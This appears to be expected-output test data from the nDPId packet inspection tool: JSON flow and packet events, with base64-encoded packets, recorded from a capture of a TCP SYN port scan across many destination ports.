+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1904,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1894,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":563,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1904,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1894,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsGkEAADQG+jGsEAAIQA2GNIzSAjPdUoMYAAAAAGACBAAyXAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1905,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1895,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":90,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1905,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1895,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAshJIAACsGmOCsEAAIQA2GNIzSAFrdUoMYAAAAAGACEAAoNQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1906,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1896,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1906,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1896,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsjeAAACgGkpKsEAAIQA2GNIzSH5TdUoMYAAAAAGACBAAU+wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1907,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1897,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2725,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1907,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1897,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsnNwAAC0GfpasEAAIQA2GNIzSCqXdUoMYAAAAAGACCAAl6gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1908,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1898,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1908,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1898,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAs5ScAACoGOUusEAAIQA2GNIzSATfdUoMYAAAAAGACDAArWAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1909,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1899,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1909,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1899,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsVI8AADIGweOsEAAIQA2GNIzSGgrdUoMYAAAAAGACDAAShQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1910,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3128,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1910,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1900,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsNeQAAC0G5Y6sEAAIQA2GNIzTDDjdU4MZAAAAAGACCAAkVAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1911,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1911,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1901,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsLcQAACwG7q6sEAAIQA2GNIzTAdHdU4MZAAAAAGACBAAyuwAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1912,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1902,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1912,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1902,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsg2kAACUGoAmsEAAIQA2GNIzTpg7dU4MZAAAAAGACCACKfQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1913,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1913,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1903,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsEhMAACUGEWCsEAAIQA2GNIzTBFTdU4MZAAAAAGACCAAsOAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1914,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1914,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1904,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsXWQAACwGvw6sEAAIQA2GNIzTA+\/dU4MZAAAAAGACBAAwnQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1915,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1905,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1915,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1905,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsIoQAACoG++6sEAAIQA2GNIzTGfbdU4MZAAAAAGACDAASlgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1916,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1916,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1906,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAseo0AACUGqOWsEAAIQA2GNIzTCAHdU4MZAAAAAGACCAAoiwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1917,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1907,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":85,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1917,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1907,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsWkgAADkGtSqsEAAIQA2GNIzTAFXdU4MZAAAAAGACCAAwNwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1918,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1908,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061275,"flow_last_seen":1278275061275,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061275,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1918,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1908,"flow_packet_id":1,"flow_last_seen":1278275061275,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061275,"pkt":"ACYLMQczACWzv5HuCABFAAAsjOIAACoGkZCsEAAIQA2GNIzTCBHdU4MZAAAAAGACDAAkewAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1919,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061275,"flow_last_seen":1278275061275,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061275,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1919,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1909,"flow_packet_id":1,"flow_last_seen":1278275061275,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061275,"pkt":"ACYLMQczACWzv5HuCABFAAAsawEAAC4Gr3GsEAAIQA2GNIzTAnHdU4MZAAAAAGACDAAqGwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1920,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1910,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061308,"flow_last_seen":1278275061308,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061308,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1920,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1910,"flow_packet_id":1,"flow_last_seen":1278275061308,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061308,"pkt":"ACYLMQczACWzv5HuCABFAAAss\/QAADkGW36sEAAIQA2GNIzTCMvdU4MZAAAAAGACCAAnwQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1921,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1911,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5225,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1921,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1911,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsePMAACYGqX+sEAAIQA2GNIzTFGndU4MZAAAAAGACDAAYIwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1922,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1922,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1912,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAskrwAAC8GhrasEAAIQA2GNIzTC8XdU4MZAAAAAGACEAAcxwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1923,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1913,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1923,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1913,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsiUkAADMGjCmsEAAIQA2GNIzTwAjdU4MZAAAAAGACEABogwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1924,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1914,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1924,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1914,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsOr4AADkG1LSsEAAIQA2GNIzTHvDdU4MZAAAAAGACCAARnAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1925,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1915,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1925,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1915,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsJLsAADEG8resEAAIQA2GNIzTAq\/dU4MZAAAAAGACCAAt3QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1926,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1916,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3372,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1926,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1916,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsxiMAACoGWE+sEAAIQA2GNIzTDSzdU4MZAAAAAGACDAAfYAAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1927,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1927,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1917,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsI\/AAACUG\/4KsEAAIQA2GNIzTAYXdU4MZAAAAAGACCAAvBwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1928,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1918,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32775,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
